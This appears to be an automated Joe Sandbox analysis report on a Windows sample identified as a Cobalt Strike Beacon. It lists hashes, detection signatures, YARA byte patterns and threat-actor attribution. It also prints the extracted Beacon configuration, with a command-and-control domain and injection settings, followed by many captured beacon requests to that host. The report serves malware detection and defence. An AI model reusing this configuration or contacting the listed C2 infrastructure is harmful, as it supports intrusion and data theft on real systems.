Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Analysis ID:1428763
MD5:c720c50306558112b389ef44cff494f1
SHA1:476f36c3f3a3aa0141b481fb683d3c0cbd767def
SHA256:6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
Tags:exe
Infos:

Detection

CobaltStrike
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Sets debug register (to hijack the execution of another thread)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 62, "MaxGetSize": 2796804, "Jitter": 81, "C2Server": "easthoolbook.com,/sign.mpeg", "HttpPostUri": "/flexible", "Malleable_C2_Instructions": ["Remove 600 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpresult.exe", "Spawnto_x64": "%windir%\\sysnative\\gpresult.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 12345, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 22918, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x760:$a39: %s as %s\%s: %d
      • 0xfa12:$a41: beacon.x64.dll
      • 0x1970:$a46: %s (admin)
      • 0x8c0:$a48: %s%s: %s
      • 0x78c:$a50: %02d/%02d/%02d %02d:%02d:%02d
      • 0x7b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
      • 0x19b9:$a51: Content-Length: %d
      00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
      • 0x1017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
      00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        Click to see the 8 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
          0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
            • 0x189f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpackWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
            • 0x3a97b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000000.00000003.2073190217.000000000208E000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 62, "MaxGetSize": 2796804, "Jitter": 81, "C2Server": "easthoolbook.com,/sign.mpeg", "HttpPostUri": "/flexible", "Malleable_C2_Instructions": ["Remove 600 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpresult.exe", "Spawnto_x64": "%windir%\\sysnative\\gpresult.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 12345, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 22918, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeReversingLabs: Detection: 25%
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_000000014003C388

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: easthoolbook.com
            Source: Joe Sandbox ViewASN Name: AVANTI-UK-ASGB AVANTI-UK-ASGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
